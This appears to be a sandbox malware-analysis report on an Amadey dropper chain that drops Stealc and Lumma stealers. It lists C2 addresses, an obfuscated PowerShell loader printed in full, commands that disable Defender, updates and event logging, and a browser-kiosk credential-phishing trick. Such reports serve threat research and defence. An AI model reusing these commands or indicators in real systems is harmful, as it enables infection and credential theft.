Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    04/12/2024, 04:20 UTC

General

  • Target

    f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe

  • Size

    3.1MB

  • MD5

    15486167d3ce2f6d927debe5fb800377

  • SHA1

    762704e63f652670244fa24b31883104e7df479b

  • SHA256

    f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664

  • SHA512

    9fc904cfc59fa81033a032b1fb451da1e5de784d40c1be05afacc65c97a4b71d4bb29b5d858c456d70b2e5ef900bf2e02f540679bf84c2452e515edd8fbd089c

  • SSDEEP

    49152:nMuDtQ1Wh5zrjADAErj+BLkfXP/IjgvHxfFZT:MuBQ1Wh5PjADAErlfXPNZDT

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 49 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
    "C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
        "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Users\Admin\AppData\Local\Temp\is-50G2V.tmp\stories.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-50G2V.tmp\stories.tmp" /SL5="$401CE,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\SysWOW64\net.exe
            "C:\Windows\system32\net.exe" pause video_jet_1235
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 pause video_jet_1235
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1772
          • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
            "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd';$mlaR='InaHWTvaHWTokaHWTeaHWT'.Replace('aHWT', ''),'GoEqIetoEqICuoEqIrroEqIentoEqIProEqIooEqIcoEqIeoEqIssoEqI'.Replace('oEqI', ''),'ElcnPTemcnPTencnPTtAcnPTtcnPT'.Replace('cnPT', ''),'LVXBNoadVXBN'.Replace('VXBN', ''),'FrSQcEoSQcEmBSQcEaSQcEse6SQcE4SQcEStrSQcEinSQcEgSQcE'.Replace('SQcE', ''),'ChhnmsanhnmsghnmseExhnmstehnmsnsihnmsonhnms'.Replace('hnms', ''),'MOYmhaOYmhinMOYmhoduOYmhleOYmh'.Replace('OYmh', ''),'DezNFDcomzNFDpzNFDrezNFDsszNFD'.Replace('zNFD', ''),'RUdUPeaUdUPdLUdUPinUdUPesUdUP'.Replace('UdUP', ''),'EnXsXntXsXnrXsXnyPoXsXninXsXntXsXn'.Replace('XsXn', ''),'CrQiuaeQiuaateQiuaDeQiuacQiuarQiuaypQiuatQiuaorQiua'.Replace('Qiua', ''),'CopwpFTyTowpFT'.Replace('wpFT', ''),'SpzcNflizcNftzcNf'.Replace('zcNf', ''),'TZlhXrZlhXanZlhXsfoZlhXrZlhXmFZlhXinZlhXaZlhXlZlhXBlZlhXockZlhX'.Replace('ZlhX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($mlaR[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function xlgJw($THCaC){$tnIYs=[System.Security.Cryptography.Aes]::Create();$tnIYs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tnIYs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tnIYs.Key=[System.Convert]::($mlaR[4])('nn1oVgQf+vsVUwhFRI0DoffekxC7+zU06CysJKUG7/E=');$tnIYs.IV=[System.Convert]::($mlaR[4])('vS7iVHdVCr38C0HCS9OQuA==');$GnhUQ=$tnIYs.($mlaR[10])();$mheDM=$GnhUQ.($mlaR[13])($THCaC,0,$THCaC.Length);$GnhUQ.Dispose();$tnIYs.Dispose();$mheDM;}function uRupt($THCaC){$rILnk=New-Object System.IO.MemoryStream(,$THCaC);$mMQDJ=New-Object System.IO.MemoryStream;$xKbEF=New-Object System.IO.Compression.GZipStream($rILnk,[IO.Compression.CompressionMode]::($mlaR[7]));$xKbEF.($mlaR[11])($mMQDJ);$xKbEF.Dispose();$rILnk.Dispose();$mMQDJ.Dispose();$mMQDJ.ToArray();}$KWCnK=[System.IO.File]::($mlaR[8])([Console]::Title);$MFCGw=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 5).Substring(2))));$CAxSJ=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 6).Substring(2))));[System.Reflection.Assembly]::($mlaR[3])([byte[]]$CAxSJ).($mlaR[9]).($mlaR[0])($null,$null);[System.Reflection.Assembly]::($mlaR[3])([byte[]]$MFCGw).($mlaR[9]).($mlaR[0])($null,$null); "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1976
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:600
      • C:\Users\Admin\AppData\Local\Temp\1011459001\df0dea1328.exe
        "C:\Users\Admin\AppData\Local\Temp\1011459001\df0dea1328.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:296
          • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
            "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2856
          • C:\Users\Admin\AppData\Local\Temp\1002824001\34204cee53.exe
            "C:\Users\Admin\AppData\Local\Temp\1002824001\34204cee53.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:1504
          • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
            "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:1784
            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:684
              • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
                "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
                7⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                PID:1520
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3620
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  8⤵
                    PID:3616
                    • C:\Windows\system32\wusa.exe
                      wusa /uninstall /kb:890830 /quiet /norestart
                      9⤵
                      • Drops file in Windows directory
                      PID:2724
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    8⤵
                    • Launches sc.exe
                    PID:3580
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    8⤵
                    • Launches sc.exe
                    PID:2396
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    8⤵
                    • Launches sc.exe
                    PID:3680
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    8⤵
                    • Launches sc.exe
                    PID:2584
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    8⤵
                    • Launches sc.exe
                    PID:3760
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3952
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3808
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3248
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3536
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "QKJNEQWA"
                    8⤵
                    • Launches sc.exe
                    PID:3552
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                    8⤵
                    • Launches sc.exe
                    PID:3612
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    8⤵
                    • Launches sc.exe
                    PID:3636
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "QKJNEQWA"
                    8⤵
                    • Launches sc.exe
                    PID:3624
            • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
              "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1464
            • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
              "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1664
              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1936
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                  7⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2356
            • C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
              "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:2912
            • C:\Users\Admin\AppData\Local\Temp\1005245001\a340910d71.exe
              "C:\Users\Admin\AppData\Local\Temp\1005245001\a340910d71.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2808
            • C:\Users\Admin\AppData\Local\Temp\1005246001\e19e6b7125.exe
              "C:\Users\Admin\AppData\Local\Temp\1005246001\e19e6b7125.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2224
        • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
          "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\1011866001\6158293fba.exe
          "C:\Users\Admin\AppData\Local\Temp\1011866001\6158293fba.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1916
        • C:\Users\Admin\AppData\Local\Temp\1011867001\4305f3e650.exe
          "C:\Users\Admin\AppData\Local\Temp\1011867001\4305f3e650.exe"
          3⤵
          • Enumerates VirtualBox registry keys
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2812
        • C:\Users\Admin\AppData\Local\Temp\1011868001\6e7c5374e5.exe
          "C:\Users\Admin\AppData\Local\Temp\1011868001\6e7c5374e5.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2980
        • C:\Users\Admin\AppData\Local\Temp\1011869001\bb34fd4a66.exe
          "C:\Users\Admin\AppData\Local\Temp\1011869001\bb34fd4a66.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2428
        • C:\Users\Admin\AppData\Local\Temp\1011870001\6b8fc9e98f.exe
          "C:\Users\Admin\AppData\Local\Temp\1011870001\6b8fc9e98f.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1124
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1148
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1648
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:2308
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:2276
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.0.1414507385\1269882267" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e76d4b2-e1de-44b7-8b61-39132cf1f2fe} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 1300 11ed7b58 gpu
                  6⤵
                    PID:548
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.1.814229275\2093082127" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62f2145d-edba-454b-9194-de0f1364700a} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 1504 d72758 socket
                    6⤵
                      PID:3040
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.2.1276849687\1385134242" -childID 1 -isForBrowser -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 21811 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c4a9441-be8e-46fc-afd7-a29fa37a8453} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 2100 18fc9358 tab
                      6⤵
                        PID:3012
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.3.2062086990\2010510078" -childID 2 -isForBrowser -prefsHandle 2884 -prefMapHandle 2880 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ada8c73b-511f-4f82-b431-db023cd2a3ea} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 2896 1cf61158 tab
                        6⤵
                          PID:2640
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.4.1430963917\1134936949" -childID 3 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d9c880-0ff1-47c3-a9c3-7f46be2ccf55} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3712 1e7cb258 tab
                          6⤵
                            PID:3700
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.5.124452207\1936875139" -childID 4 -isForBrowser -prefsHandle 3820 -prefMapHandle 3824 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {406f82ef-a88a-41db-89db-8402079116aa} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3808 1e7cac58 tab
                            6⤵
                              PID:3708
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.6.1467052612\655245421" -childID 5 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e18cf64-35e6-407f-a779-464455c134de} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3972 1f866e58 tab
                              6⤵
                                PID:3720
                        • C:\Users\Admin\AppData\Local\Temp\1011871001\e65cf67d33.exe
                          "C:\Users\Admin\AppData\Local\Temp\1011871001\e65cf67d33.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3200
                        • C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe
                          "C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3956
                    • C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                      C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                      1⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
